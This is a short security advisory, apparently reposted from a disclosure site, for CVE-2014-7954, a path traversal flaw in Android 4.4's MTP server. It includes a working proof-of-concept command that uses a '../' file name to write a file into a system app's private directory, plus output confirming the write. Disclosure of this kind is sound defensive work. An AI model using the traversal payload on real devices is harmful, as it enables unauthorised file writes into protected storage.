Android 4.4 MTP Path Traversal

Published
Credit
Risk
2015.04.20
Imre Rad
Medium
CWE
CVE
Local
Remote
CWE-22
CVE-2014-7954
No
Yes

MTP path traversal vulnerability in Android 4.4
-----------------------------------------------

doSendObjectInfo() method of the MtpServer class implemented in
frameworks/av/media/mtp/MtpServer.cpp does not validate the name
parameter of the incoming MTP packet at all.

It is possible to upload files outside of the sdcard using a specially
crafted MTP request:

root@testpc:~/mtp-test# ./mtp-mysend sdf.txt \
../../../.././../data/data/com.android.providers.media/sdf.txt
libmtp version: 1.1.3

Device 0 (VID=18d1 and PID=4e42) is UNKNOWN.
Please report this VID/PID and the device model to the libmtp
development team
Android device detected, assigning default bug flags
Sending sdf.txt as
../../../../../../data/data/com.android.providers.media/sdf.txt
Sending file...
Progress: 25 of 25 (100%)
New file ID: 203



The file is written by the process com.android.providers.media:

root@grouper:/data/data/com.android.providers.media # ls -la
ls -la
drwxrwx--x u0_a6 u0_a6 2014-07-22 01:06 cache
drwxrwx--x u0_a6 u0_a6 2014-07-22 01:07 databases
lrwxrwxrwx install install 2014-07-22 01:05 lib ->
/data/app-lib/com.android.providers.media
-rw-rw-r-- u0_a6 media_rw 13 2014-09-24 01:36 sdf.txt
drwxrwx--x u0_a6 u0_a6 2014-07-22 01:06 shared_prefs


Tested on: Android 4.4.4
Reported on: 2014-09-26
Assigned CVE: CVE-2014-7954
Discovered by: Imre Rad / Search-Lab Ltd.
http://www.search-lab.hu
http://www.securecodingacademy.com/


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com